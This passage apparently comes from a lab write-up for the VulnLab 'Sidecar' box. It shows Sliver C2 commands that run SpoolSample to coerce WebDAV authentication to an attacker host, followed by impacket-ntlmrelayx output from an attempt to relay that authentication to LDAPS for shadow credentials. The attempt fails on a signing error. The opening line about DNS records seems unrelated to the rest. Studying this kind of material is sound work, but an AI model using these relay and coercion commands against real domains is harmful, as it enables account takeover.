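In a real zone the (name, blob) pairs come from an LDAP query of the dnsNode objects under CN=MicrosoftDNS,DC=DomainDnsZones; both records above decode to 10.8.2.138, which is exactly the kind of non-corporate address this check is meant to surface.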

WebDav to LDAP relay

Finally we need to trigger the HTTP authentication with PetitPotam or SpoolSample.

.

So now we exit and restart the Sliver C2 server,

then we execute:

execute-assembly -i -E /payloads/payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"
inline-execute-assembly /payloads/SpoolSample.exe "10.18.2.138 vulnlab@80/blub.txt"

.

Thus:

sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669

[*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"

[!] rpc error: code = Unknown desc = implant timeout
sliver (sitecar-3) >  


Catch it:

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED
[*] HTTPD(80): Client requested path: /puckshell.txt

Now we are stuck at this error:

The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).

to be continued …

.
